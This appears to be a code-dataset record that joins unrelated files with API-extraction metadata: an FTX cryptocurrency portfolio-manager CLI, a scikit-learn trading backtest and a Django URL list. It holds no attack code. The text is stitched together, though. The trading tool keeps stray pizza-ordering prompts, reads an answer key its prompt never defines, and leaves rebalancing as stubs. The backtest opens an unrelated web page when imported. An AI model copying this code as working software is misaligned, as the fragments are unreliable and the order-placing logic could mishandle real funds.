False, 'import os\n'), ((2260, 2292), 'os.path.join', 'os.path.join', (['"""src"""', 'source_file'], {}), "('src', source_file)\n", (2272, 2292), False, 'import os\n'), ((2515, 2551), 'os.path.join', 'os.path.join', (['"""include"""', '"""secrets.h"""'], {}), "('include', 'secrets.h')\n", (2527, 2551), False, 'import os\n'), ((2411, 2443), 'os.path.join', 'os.path.join', (['"""src"""', 'source_file'], {}), "('src', source_file)\n", (2423, 2443), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
"""
* Pizza delivery prompt example
* run example by writing `python example/pizza.py` in your console
"""
from __future__ import print_function, unicode_literals
import regex
from pprint import pprint
from PyInquirer import style_from_dict, Token, prompt
from PyInquirer import Validator, ValidationError, print_json
from examples import custom_style_3, custom_style_2, custom_style_1
import yaml
from ftx.ftx_operations import FTXMasterAccount, Position, Order
from tabulate import tabulate
from babel.numbers import format_currency
# Initialise Variables
master: FTXMasterAccount  # assigned in main() once the master account is initialised
class objdict(dict):
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
def __setattr__(self, name, value):
self[name] = value
def __delattr__(self, name):
if name in self:
del self[name]
else:
raise AttributeError("No such attribute: " + name)
def print_formatting():
print(" ")
print(" ")
print("===========================================================================================================")
def print_title(word):
length = len(word)
topline = ''
line = ''
for x in range(length):
line = line + '_'
topline = topline + '-'
print(" ")
print(topline)
print(word)
print(topline)
print(" ")
def validate(document):
    ok = regex.match(
        r'^([01]{1})?[-.\s]?\(?(\d{3})\)?[-.\s]?(\d{3})[-.\s]?(\d{4})\s?((?:#|ext\.?\s?|x\.?\s?){1}(?:\d+)?)?$',
        document.text)
if not ok:
raise ValidationError(
message='Please enter a valid phone number',
cursor_position=len(document.text)) # Move cursor to end
def validate_percent(document):
    try:
        value = int(document.text)
        if not (0 < value < 101):
            raise ValidationError(
                message='Please enter a valid number between 1 and 100.',
                cursor_position=len(document.text))  # Move cursor to end
    except ValueError:
        raise ValidationError(
            message='Please enter a number between 1 and 100',
            cursor_position=len(document.text))  # Move cursor to end
class NumberValidator(Validator):
def validate(self, document):
try:
int(document.text)
except ValueError:
raise ValidationError(
message='Please enter a number',
cursor_position=len(document.text)) # Move cursor to end
print('FTX Portfolio Manager')
print('')
def initialise_yaml():
try:
with open(r'configuration_dev.yaml') as file:
dataMap = yaml.safe_load(file)
return dataMap
except Exception as e:
with open(r'configuration.yaml') as file:
dataMap = yaml.safe_load(file)
return dataMap
def get_master_accounts():
config = initialise_yaml()
accounts = config['accounts']
return accounts
def always_show(answers):
return True
def get_master_account_list():
accounts = get_master_accounts()
names = []
for account in accounts:
names.append(account['account_name'])
return sorted(names)
def get_positions_list(answers):
position_list = []
positions = master.list_all_positions()
for position in positions:
position: Position
# position_details = "Market: {} | Side: {} | PnL: {}".format(str(position.market), str(position.side),
# str(position.recent_pnl))
position_details = position.market
position_list.append(position_details)
return position_list
def get_sub_account_list(answers):
accounts = []
accounts.append('All Accounts')
accounts.extend(master.sub_account_names)
return sorted(accounts)
def get_spot_markets(answers):
print(answers)
names = []
markets = master.client.list_spot_markets()
for market in markets:
names.append(market.get('name'))
return names
def parse_close_positions(answers, master_account):
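    # Translate prompt answers into the (market, close_percent) pair that
    # close_positions() expects; 'all'/'long'/'short' select groups of positions.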
try:
message = ''
# print("get_positions_confirmation_message")
# print(answers)
if answers['positions_operation'] != 'close a position':
if answers['positions_operation'] == 'close all positions':
market = 'all'
market_message = 'All Positions'
elif answers['positions_operation'] == 'close long positions':
market = 'long'
market_message = 'All Long Positions'
elif answers['positions_operation'] == 'close short positions':
market = 'short'
market_message = 'All Short Positions'
else:
market = answers['which_position']
market_message = 'position in ' + answers['which_position']
close_size = int(answers['close_percent'])
if close_size > 0 and close_size < 101:
print("Are you sure you want to close [{}] by [{}%]?".format(market_message, close_size))
return market, close_size
else:
            print("Can't close position size by [{}]. Please try again and choose a number between 1 and 100.".format(close_size))
ask_root_question(master_account)
except Exception as e:
print(e)
master_account_question = [{
'type': 'list',
'name': 'account_name',
'message': 'What master account do you want to use?',
'choices': get_master_account_list(),
'filter': lambda val: val.lower(),
'when': always_show
}]
operation_question = [{
'type': 'list',
'name': 'operation',
'message': 'What operation do you want to perform?',
'choices': ['View Balances', 'Track Liquidity', 'View Positions', 'Close Positions', 'Rebalance Portfolio',
'Scaled Order', 'Exit'],
'filter': lambda val: val.lower(),
'when': always_show
}]
scaled_order_questions = [
{
'type': 'list',
'name': 'account_question',
'message': 'Which account do you want to trade from?',
'choices': get_sub_account_list,
'filter': lambda val: val.lower(),
'when': always_show
},
{
'type': 'list',
'name': 'asset_question',
'message': 'Which asset do you want to trade?',
# 'choices': get_account_choices(),
'choices': ["BTC/USD", "ETH/USD", "FTT/USD"],
'filter': lambda val: val.lower(),
'when': always_show
},
{
'type': 'list',
'name': 'buy_or_sell',
'message': 'Buying or selling?',
# 'choices': get_account_choices(),
'choices': ["Buy", "Sell"],
'filter': lambda val: val.lower(),
'when': always_show
},
{
'type': 'input',
'name': 'trade_percentage',
'message': 'What percentage of your available holdings do you want to buy/sell?',
'when': always_show
},
{
'type': 'input',
'name': 'price_high',
'message': 'Enter the highest limit price you want to trade?',
'when': always_show
},
{
'type': 'input',
'name': 'price_low',
'message': 'Enter the lowest limit price you want to trade?',
'when': always_show
},
{
'type': 'input',
'name': 'no_orders',
'message': 'How many trades do you want to spread the total size between?',
'when': always_show
}
]
account_question = [{
'type': 'list',
'name': 'account_question',
'message': 'Which account is the "empty" one that you want to centralise funds in before distributing?',
# 'choices': get_account_choices(),
'choices': ['get choices'],
'filter': lambda val: val.lower()
}]
confirm_question = [
{
'type': 'list',
'name': 'confirm',
'message': 'Are you sure you want to continue?',
'choices': ['No', 'Yes'],
'filter': lambda val: val.lower()
}]
position_questions = [
{
'type': 'list',
'name': 'positions_operation',
'message': 'What do you want to do with your positions?',
'choices': ['Close a Position', 'Close All Positions', 'Close Long Positions', 'Close Short Positions'],
'filter': lambda val: val.lower()
}
,
{
'type': 'list',
'name': 'which_position',
'message': 'Which position do you want to alter?',
'choices': get_positions_list,
'filter': lambda val: val.lower(),
'when': lambda answers: answers['positions_operation'] == 'close a position'
},
{
'type': 'input',
'name': 'close_percent',
'message': 'What percentage of the chosen positions do you want to close? Enter a number between 1 and 100.',
},
]
rebalance_question = [{
'type': 'list',
'name': 'warning_question',
'message': 'This will mean closing any positions you have open in any accounts affected, do you want to continue?',
'choices': ['Yes', 'No'],
'filter': lambda val: val.lower()
}]
questions = [
{
'type': 'list',
'name': 'operation',
'message': 'What operation do you want to perform?',
'choices': ['Close Positions', 'Rebalance Portfolio', 'Small'],
'filter': lambda val: val.lower()
},
{
'type': 'input',
'name': 'quantity',
'message': 'How many do you need?',
'validate': NumberValidator,
'filter': lambda val: int(val)
},
{
'type': 'expand',
'name': 'toppings',
'message': 'What about the toppings?',
'choices': [
{
'key': 'p',
'name': 'Pepperoni and cheese',
'value': 'PepperoniCheese'
},
{
'key': 'a',
'name': 'All dressed',
'value': 'alldressed'
},
{
'key': 'w',
'name': 'Hawaiian',
'value': 'hawaiian'
}
]
},
{
'type': 'rawlist',
'name': 'beverage',
'message': 'You also get a free 2L beverage',
'choices': ['Pepsi', '7up', 'Coke']
},
{
'type': 'input',
'name': 'comments',
'message': 'Any comments on your purchase experience?',
'default': 'Nope, all good!'
},
{
'type': 'list',
'name': 'prize',
'message': 'For leaving a comment, you get a freebie',
'choices': ['cake', 'fries'],
'when': lambda answers: answers['comments'] != 'Nope, all good!'
}
]
# def initialise_account(master_account):
# sub_accounts: list = []
# initialised_master: FTXMasterAccount = None
#
# for key, account in master_account.items():
# if account['master_account']:
# initialised_master = FTXMasterAccount(account['api_key'], account['api_secret'])
# initialised_master.connect()
# client_account = FTXAccount(account['subaccount_name'], account['api_key'], account['api_secret'])
# #client_account.connect()
# sub_accounts.append(client_account)
#
# if initialised_master:
# initialised_master.sub_accounts = sub_accounts
# return initialised_master
#
# return None
def print_account_details(sub_account: FTXMasterAccount):
try:
account_info = sub_account.client.get_account_info()
print("For sub account: [{}]".format(sub_account.name))
total_usd_val = sub_account.total_usd_value
print("Total USD Value of this account: [${}]".format(str(total_usd_val)))
total_btc_col, btc_usd_val = sub_account.total_btc_collateral
total_usd_col, usd_usd_val = sub_account.total_usd_collateral
total_eth_col, eth_usd_val = sub_account.total_eth_collateral
total_ftt_col, ftt_usd_val = sub_account.total_ftt_collateral
btc_percent = str(round(btc_usd_val / total_usd_val * 100, 1)) + "%"
eth_percent = str(round(eth_usd_val / total_usd_val * 100, 1)) + "%"
usd_percent = str(round(usd_usd_val / total_usd_val * 100, 1)) + "%"
ftt_percent = str(round(ftt_usd_val / total_usd_val * 100, 1)) + "%"
table = [["BTC", total_btc_col, btc_usd_val, btc_percent], ["ETH", total_eth_col, eth_usd_val, eth_percent],
["USD", total_usd_col, usd_usd_val, usd_percent], ["FTT", total_ftt_col, ftt_usd_val, ftt_percent],
["Total", 'N/A', total_usd_val, "100%"]]
headers = ["Asset", "# Coins Owned", "USD Value", "% of Capital"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print("")
print("======================================================")
print("======================================================")
print("")
# pie_labels = 'BTC', 'USD', 'ETH', 'FTT'
# pie_data = [btc_usd_val, usd_usd_val, eth_usd_val, ftt_usd_val]
# figureObject, axesObject = plotter.subplots()
# # Draw the pie chart
# axesObject.pie(pie_data,
# labels=pie_labels,
# autopct='%1.1f%%',
# shadow=True,
# startangle=90)
# # Aspect ratio - equal means pie is a circle
# axesObject.axis('equal')
# plotter.show()
except Exception as e:
print(e)
def print_master_account_summary(account: FTXMasterAccount):
print_formatting()
print_title("SUMMARY OF ASSETS")
account_list = 'Main Account, '
for sub in sorted(account.sub_account_names):
account_list = account_list + sub + ', '
account_list = account_list[:-2]
print("Master Account: [{}]".format(account.account_name))
print("Accounts: [{}]".format(account_list))
print(" ")
total_usd_val = round(account.total_usd_value, 2)
total_btc_val = round(account.total_btc_value, 8)
print("Total USD Value of this account: {}".format(format_currency(total_usd_val, 'USD', locale='en_US')))
print("Total BTC Value of this account: {} BTC".format(str(total_btc_val)))
print(" ")
total_btc_col, btc_usd_val = account.total_btc_collateral
total_usd_col, usd_usd_val = account.total_usd_collateral
total_eth_col, eth_usd_val = account.total_eth_collateral
total_ftt_col, ftt_usd_val = account.total_ftt_collateral
btc_percent = str(round(btc_usd_val / total_usd_val * 100, 1)) + "%"
eth_percent = str(round(eth_usd_val / total_usd_val * 100, 1)) + "%"
usd_percent = str(round(usd_usd_val / total_usd_val * 100, 1)) + "%"
ftt_percent = str(round(ftt_usd_val / total_usd_val * 100, 1)) + "%"
table = [["BTC", round(total_btc_col, 8), format_currency(btc_usd_val, 'USD', locale='en_US'), btc_percent],
["ETH", total_eth_col, format_currency(eth_usd_val, 'USD', locale='en_US'), eth_percent],
["USD", round(total_usd_col, 2), format_currency(usd_usd_val, 'USD', locale='en_US'), usd_percent],
["FTT", total_ftt_col, format_currency(ftt_usd_val, 'USD', locale='en_US'), ftt_percent],
["Total", 'N/A', format_currency(total_usd_val, 'USD', locale='en_US'), "100%"]]
headers = ["Asset", "# Coins Owned", "USD Value", "% of Capital"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print_formatting()
print_title("SUMMARY OF STRATEGIES")
print("Accounts: [{}]".format(account_list))
print(" ")
table = []
# Add Main Account first
inner_list = []
inner_list.append("Main Account")
inner_list.append(format_currency(account.by_sub_balances_to_usd(), 'USD', locale='en_US'))
percent_diff = str(round(account.by_sub_balances_to_usd() / total_usd_val * 100, 1)) + "%"
inner_list.append(percent_diff)
table.append(inner_list)
for sub_name, sub_client in account.sub_accounts.items():
inner_list = []
inner_list.append(sub_name)
inner_list.append(format_currency(account.by_sub_balances_to_usd(sub_name), 'USD', locale='en_US'))
percent_diff = str(round(account.by_sub_balances_to_usd(sub_name) / total_usd_val * 100, 1)) + "%"
inner_list.append(percent_diff)
table.append(inner_list)
headers = ["Sub Account", "USD Value", "% of Capital"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print(" ")
print("===========================================================================================================")
print(" ")
def rebalance_operation(master_account: FTXMasterAccount):
""" Take all sub accounts and try to rebalance them evenly.
Start with the accounts with greatest difference and then recursively even them out."""
sub_balances = master_account.get_all_balances()
    min_value = float('inf')
    max_value = 0
    min_balance = None
    max_balance = None
    for balance in sub_balances:
        # Independent checks: a single balance can be both the current min and max.
        if balance.usd_value < min_value:
            min_value = balance.usd_value
            min_balance = balance
        if balance.usd_value > max_value:
            max_value = balance.usd_value
            max_balance = balance
    diff = max_value - min_value
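    # TODO: transfer roughly diff / 2 from max_balance to min_balance and
    # recurse until the sub accounts are even, per the docstring above.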
def track_liquidity(account: FTXMasterAccount):
""" Print out the current value in USD liquidity for LRAIC tradable assets"""
print_formatting()
print_title("LIQUIDITY TRACKER (1% Away from Asks/Bids)")
assets = []
if account.settings.liquidity_tracker['all']:
# Get list of all markets
markets = account.client.list_markets()
for market in markets:
assets.append(market['name'])
else:
assets = account.settings.liquidity_tracker['markets_list']
table = []
asset_with_liquidty = []
for asset in assets:
# Get orderbook details
book = account.client.get_orderbook(asset, 100)
ask_price = book['asks'][0][0]
bid_price = book['bids'][0][0]
percent_away_from_ask = ask_price * float(1.01)
percent_away_from_bid = bid_price * float(0.99)
ask_liquidity = 0
for ask in book['asks']:
if ask[0] < percent_away_from_ask:
ask_liquidity = ask_liquidity + (ask[0] * ask[1])
else:
break
bid_liquidity = 0
for bid in book['bids']:
if bid[0] > percent_away_from_bid:
bid_liquidity = bid_liquidity + (bid[0] * bid[1])
else:
break
liquidy_dict = {}
liquidy_dict['asset'] = asset
liquidy_dict['ask_liquidity'] = ask_liquidity
liquidy_dict['bid_liquidity'] = bid_liquidity
asset_with_liquidty.append(liquidy_dict)
# Sort the list by liquidity
sorted_liquidity = sorted(asset_with_liquidty, key=lambda x: x['bid_liquidity'], reverse=True)
for asset in sorted_liquidity:
inner_list = []
inner_list.append(asset['asset'])
inner_list.append(format_currency(asset['ask_liquidity'], 'USD', locale='en_US'))
inner_list.append(format_currency(asset['bid_liquidity'], 'USD', locale='en_US'))
table.append(inner_list)
headers = ["Asset", "USD Ask Liquidity", "USD Bid Liquidity"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print_formatting()
def ask_rebalance_question(master_account):
answers = prompt(rebalance_question, style=custom_style_3)
if answers['rebalance_operation'] == 'yes':
# TODO: Implement
rebalance_operation(master_account)
elif answers['rebalance_operation'] == 'no':
ask_root_question(master_account)
def close_all_positions(master_account: FTXMasterAccount):
for account in master_account.sub_accounts:
pass
# Get positions
# Close positions
def view_positions(master_account):
print_formatting()
print_title("ACCOUNT POSITIONS")
all_positions = master_account.list_all_positions()
table = []
for position in all_positions:
position: Position
inner_list = []
inner_list.append(position.market)
inner_list.append(position.sub_account)
inner_list.append(position.side)
inner_list.append(format(position.open_size, '.8f'))
inner_list.append(format_currency(abs(position.cost), 'USD', locale='en_US'))
inner_list.append(format_currency(position.recent_pnl, 'USD', locale='en_US'))
inner_list.append(format_currency(position.alltime_pnl, 'USD', locale='en_US'))
table.append(inner_list)
sorted_table = sorted(table, key=lambda x: x[5], reverse=True)
headers = ["Market", "Sub Account", "Side", "Size", "Cost", "Current PnL", "All Time PnL"]
print(tabulate(sorted_table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print_formatting()
def close_positions(master_account: FTXMasterAccount, market: str, close_percent: int):
""" Close 1 or many positions by X% """
try:
master_account.close_positions(market, close_percent=close_percent)
print("Success!")
except Exception as e:
print("Uhoh, Exception!: {}".format(e))
print("Recommended you check your FTX accounts/positions manually!")
def ask_position_questions(master_account: FTXMasterAccount):
position_answers = prompt(position_questions, style=custom_style_3)
market, close_percent = parse_close_positions(position_answers, master_account)
confirm_answer = prompt(confirm_question, style=custom_style_3)
if confirm_answer['confirm'] == 'yes':
close_positions(master_account, market, close_percent)
else:
print("Cancelled Operation.")
def ask_order_questions(master_account: FTXMasterAccount):
scaled_order_answers = prompt(scaled_order_questions, style=custom_style_2)
print(scaled_order_answers)
account = scaled_order_answers['account_question']
    market = str(scaled_order_answers['asset_question']).upper()  # FTX market symbols are upper-case, e.g. 'BTC/USD'
side = scaled_order_answers['buy_or_sell']
trade_percentage = scaled_order_answers['trade_percentage']
high = scaled_order_answers['price_high']
low = scaled_order_answers['price_low']
no_orders = scaled_order_answers['no_orders']
print(scaled_order_answers)
if account == 'all accounts':
master_account.scaled_order_all(market=market, side=side, high=high, low=low, percent_size=trade_percentage,
no_orders=no_orders)
else:
master_account.by_sub_scaled_order(account, market=market, side=side, high=high, low=low,
percent_size=trade_percentage, no_orders=no_orders)
def ask_root_question(master_account):
operation_answers = prompt(operation_question, style=custom_style_3)
# print(str(operation_answers))
if operation_answers['operation'] == 'close positions':
ask_position_questions(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'view balances':
print_master_account_summary(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'view positions':
view_positions(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'rebalance portfolio':
# TODO: Implement
pass
elif operation_answers['operation'] == 'track liquidity':
track_liquidity(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'scaled order':
ask_order_questions(master_account)
ask_root_question(master_account)
else:
exit()
def get_account_choices():
settings = initialise_yaml()
master_account = settings['accounts']
return ["CAT", "HAT"]
def print_balances(master_account):
# for sub_account in master_account.sub_accounts:
# sub_account: FTXAccount
# print_account_details(sub_account)
print_master_account_summary(master_account)
def main():
try:
config = initialise_yaml()
accounts = config['accounts']
settings = config['settings']
settings = objdict(settings)
master_account = None
if len(accounts) > 1:
try:
account_answers = prompt(master_account_question, style=custom_style_3)
for account in accounts:
if account['account_name'].lower() == account_answers['account_name']:
master_account = account
except:
master_account = accounts[0]
master_account = objdict(master_account)
print("Defaulting to account: [{}]".format(master_account.account_name))
elif len(accounts) == 1:
master_account = accounts[0]
else:
master_account = None
print("No master accounts detected. Is your configuration.yaml set up correctly?")
if master_account is not None:
master_account = objdict(master_account)
anti_algo_subaccount_name = master_account.anti_algo_subaccount_name
subaccount_names = master_account.subaccount_names
# Initialise accounts
master_account: FTXMasterAccount = FTXMasterAccount(master_account['api_key'], master_account['api_secret'],
master_account.account_name, settings)
if subaccount_names is not None:
master_account.sub_account_names.extend(subaccount_names)
master_account.anti_algo_subaccount_name = anti_algo_subaccount_name
master_account.initialise()
global master
master = master_account
try:
ask_root_question(master_account)
except Exception as e:
print(e)
#rebalance_operation(master_account)
balances = master_account.get_all_balances()
# Assume we are in debug mode rather than running from windows CMD
# Run feature being tested
# master_account.by_sub_get_size_free_collateral('ADAM LRAIC ADA', 50)
# master_account.scaled_order_all('BTC/USD', 'buy', 4500, 3000, 50, no_orders=2)
# master_account.by_sub_usd_flat('ADAM LRAIC ADA')
# master_account.by_sub_scaled_order('adam lraic bch', market='BTC/USD', side='buy', high=4500, low=3050,
# percent_size=100, no_orders=20)
# master_account.all_usd_flat()
# master_account.scaled_order_all(market='BTC/USD', side='buy', high=4500, low=3050,
# percent_size=100, no_orders=20)
# master_account.by_sub_scaled_order('ADAM LRAIC ADA', market='BTC/USD', side='buy', high=4500, low=3050,
# percent_size=100, no_orders=20)
except Exception as e:
print(e)
if __name__ == "__main__":
main()
|
[
"babel.numbers.format_currency",
"ftx.ftx_operations.FTXMasterAccount",
"tabulate.tabulate",
"yaml.safe_load",
"regex.match",
"PyInquirer.prompt"
] |
[((1506, 1660), 'regex.match', 'regex.match', (['"""^([01]{1})?[-.\\\\s]?\\\\(?(\\\\d{3})\\\\)?[-.\\\\s]?(\\\\d{3})[-.\\\\s]?(\\\\d{4})\\\\s?((?:#|ext\\\\.?\\\\s?|x\\\\.?\\\\s?){1}(?:\\\\d+)?)?$"""', 'document.text'], {}), "(\n '^([01]{1})?[-.\\\\s]?\\\\(?(\\\\d{3})\\\\)?[-.\\\\s]?(\\\\d{3})[-.\\\\s]?(\\\\d{4})\\\\s?((?:#|ext\\\\.?\\\\s?|x\\\\.?\\\\s?){1}(?:\\\\d+)?)?$'\n , document.text)\n", (1517, 1660), False, 'import regex\n'), ((19590, 19638), 'PyInquirer.prompt', 'prompt', (['rebalance_question'], {'style': 'custom_style_3'}), '(rebalance_question, style=custom_style_3)\n', (19596, 19638), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((21518, 21566), 'PyInquirer.prompt', 'prompt', (['position_questions'], {'style': 'custom_style_3'}), '(position_questions, style=custom_style_3)\n', (21524, 21566), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((21672, 21718), 'PyInquirer.prompt', 'prompt', (['confirm_question'], {'style': 'custom_style_3'}), '(confirm_question, style=custom_style_3)\n', (21678, 21718), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((21961, 22013), 'PyInquirer.prompt', 'prompt', (['scaled_order_questions'], {'style': 'custom_style_2'}), '(scaled_order_questions, style=custom_style_2)\n', (21967, 22013), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((22936, 22984), 'PyInquirer.prompt', 'prompt', (['operation_question'], {'style': 'custom_style_3'}), '(operation_question, style=custom_style_3)\n', (22942, 22984), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((15528, 15593), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (15536, 15593), False, 'from tabulate import tabulate\n'), ((16562, 16627), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (16570, 16627), False, 'from tabulate import tabulate\n'), ((19440, 19505), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (19448, 19505), False, 'from tabulate import tabulate\n'), ((20937, 21009), 'tabulate.tabulate', 'tabulate', (['sorted_table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(sorted_table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (20945, 21009), False, 'from tabulate import tabulate\n'), ((2852, 2872), 'yaml.safe_load', 'yaml.safe_load', (['file'], {}), '(file)\n', (2866, 2872), False, 'import yaml\n'), ((12823, 12888), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (12831, 12888), False, 'from tabulate import tabulate\n'), ((14228, 14281), 'babel.numbers.format_currency', 'format_currency', (['total_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(total_usd_val, 'USD', locale='en_US')\n", (14243, 14281), False, 'from babel.numbers import format_currency\n'), ((14968, 15019), 'babel.numbers.format_currency', 'format_currency', (['btc_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(btc_usd_val, 'USD', locale='en_US')\n", (14983, 15019), False, 'from babel.numbers import format_currency\n'), ((15071, 15122), 
'babel.numbers.format_currency', 'format_currency', (['eth_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(eth_usd_val, 'USD', locale='en_US')\n", (15086, 15122), False, 'from babel.numbers import format_currency\n'), ((15184, 15235), 'babel.numbers.format_currency', 'format_currency', (['usd_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(usd_usd_val, 'USD', locale='en_US')\n", (15199, 15235), False, 'from babel.numbers import format_currency\n'), ((15287, 15338), 'babel.numbers.format_currency', 'format_currency', (['ftt_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(ftt_usd_val, 'USD', locale='en_US')\n", (15302, 15338), False, 'from babel.numbers import format_currency\n'), ((15384, 15437), 'babel.numbers.format_currency', 'format_currency', (['total_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(total_usd_val, 'USD', locale='en_US')\n", (15399, 15437), False, 'from babel.numbers import format_currency\n'), ((19176, 19238), 'babel.numbers.format_currency', 'format_currency', (["asset['ask_liquidity']", '"""USD"""'], {'locale': '"""en_US"""'}), "(asset['ask_liquidity'], 'USD', locale='en_US')\n", (19191, 19238), False, 'from babel.numbers import format_currency\n'), ((19266, 19328), 'babel.numbers.format_currency', 'format_currency', (["asset['bid_liquidity']", '"""USD"""'], {'locale': '"""en_US"""'}), "(asset['bid_liquidity'], 'USD', locale='en_US')\n", (19281, 19328), False, 'from babel.numbers import format_currency\n'), ((20581, 20640), 'babel.numbers.format_currency', 'format_currency', (['position.recent_pnl', '"""USD"""'], {'locale': '"""en_US"""'}), "(position.recent_pnl, 'USD', locale='en_US')\n", (20596, 20640), False, 'from babel.numbers import format_currency\n'), ((20668, 20728), 'babel.numbers.format_currency', 'format_currency', (['position.alltime_pnl', '"""USD"""'], {'locale': '"""en_US"""'}), "(position.alltime_pnl, 'USD', locale='en_US')\n", (20683, 20728), False, 'from babel.numbers import format_currency\n'), ((25501, 25617), 'ftx.ftx_operations.FTXMasterAccount', 'FTXMasterAccount', (["master_account['api_key']", "master_account['api_secret']", 'master_account.account_name', 'settings'], {}), "(master_account['api_key'], master_account['api_secret'],\n master_account.account_name, settings)\n", (25517, 25617), False, 'from ftx.ftx_operations import FTXMasterAccount, Position, Order\n'), ((2999, 3019), 'yaml.safe_load', 'yaml.safe_load', (['file'], {}), '(file)\n', (3013, 3019), False, 'import yaml\n'), ((24519, 24572), 'PyInquirer.prompt', 'prompt', (['master_account_question'], {'style': 'custom_style_3'}), '(master_account_question, style=custom_style_3)\n', (24525, 24572), False, 'from PyInquirer import style_from_dict, Token, prompt\n')]
|
import webbrowser
import numpy as np
import pandas as pd
from pandas_datareader import data as web
from sklearn import linear_model
webbrowser.open("https://github.com/philliphsu/BottomSheetPickers")
class ScikitBacktest(object):
def __init__(self, sys):
        self.data = None
        self.matrix = None
        self.lags = 5
        self.symbol = sys
        self.get_data()
        self.lm = linear_model.LogisticRegression(C=1e3)
    def get_data(self):
        d = web.DataReader(self.symbol, data_source='yahoo')['Adj Close']
        d = pd.DataFrame(d)
        d.columns = [self.symbol]
        d['returns'] = np.log(d / d.shift())
        self.data = d
def select_data(self, start, end):
d = self.data[(self.data.index >= start) & (self.data.index <= end)].copy()
return d
    def get_matrix(self, start, end):
        # Build the lagged returns matrix and store it for fitting/prediction
        d = self.select_data(start, end)['returns'].values
        m = np.zeros((self.lags + 1, len(d) - self.lags))
        for i in range(self.lags + 1):
            if i == self.lags:
                m[i] = d[i:]
            else:
                m[i] = d[i:i - self.lags]
        self.matrix = m
def fit_model(self, start, end):
self.get_matrix(start, end)
self.lm.fit(self.matrix[:self.lags], np.sign(self.matrix[self.lags]))
def predict_moves(self, start, end):
self.get_matrix(start, end)
pred = self.lm.predict(self.matrix[:self.lags])
return pred
def run_strategy(self, start_tr, end_tr, start_te, end_te, lags):
self.lags = lags
self.fit_model(start_tr, end_tr)
pred = self.predict_moves(start_te, end_te)
d = self.select_data(start_te, end_te)
        d['pred'] = 0.0
        # .ix was removed from pandas; use label-based assignment instead
        d.loc[d.index[self.lags:], 'pred'] = pred
        d['strategy'] = d.pred * d.returns
        title = '%s to %s for %d lags' % (start_te, end_te, self.lags)
        d[['returns', 'strategy']].iloc[self.lags:].cumsum().apply(np.exp).plot(title=title)
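# A minimal usage sketch (hypothetical ticker and dates; assumes the 'yahoo'
# data source in pandas-datareader is reachable):
#   bt = ScikitBacktest('AAPL')
#   bt.run_strategy('2015-01-01', '2016-12-31', '2017-01-01', '2017-12-31', lags=5)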
|
[
"pandas.DataFrame",
"webbrowser.open",
"pandas_datareader.data.DataReader",
"sklearn.linear_model.LogisticRegression",
"numpy.sign"
] |
[((134, 201), 'webbrowser.open', 'webbrowser.open', (['"""https://github.com/philliphsu/BottomSheetPickers"""'], {}), "('https://github.com/philliphsu/BottomSheetPickers')\n", (149, 201), False, 'import webbrowser\n'), ((399, 440), 'sklearn.linear_model.LogisticRegression', 'linear_model.LogisticRegression', ([], {'C': '(1000.0)'}), '(C=1000.0)\n', (430, 440), False, 'from sklearn import linear_model\n'), ((546, 561), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {}), '(d)\n', (558, 561), True, 'import pandas as pd\n'), ((475, 520), 'pandas_datareader.data.DataReader', 'web.DataReader', (['self.sys'], {'data_source': '"""yahoo"""'}), "(self.sys, data_source='yahoo')\n", (489, 520), True, 'from pandas_datareader import data as web\n'), ((1198, 1229), 'numpy.sign', 'np.sign', (['self.matrix[self.lags]'], {}), '(self.matrix[self.lags])\n', (1205, 1229), True, 'import numpy as np\n')]
|
from django.conf.urls import url
from . import views
urlpatterns=[
    url('^$', views.landing, name='landingUrl'),
    url(r'^profile/create', views.create_profile, name='create_profileUrl'),
    url(r'^post/create', views.post, name='postUrl'),
    url(r'^business/create', views.business, name='businessUrl'),
    url(r'^business/view', views.view_business, name='viewBusinessUrl'),
    url(r'^move/out', views.move_out, name='move_outUrl'),
    url(r'^moving/out/(\d+)', views.moving, name='movingUrl'),
]
|
[
"django.conf.urls.url"
] |
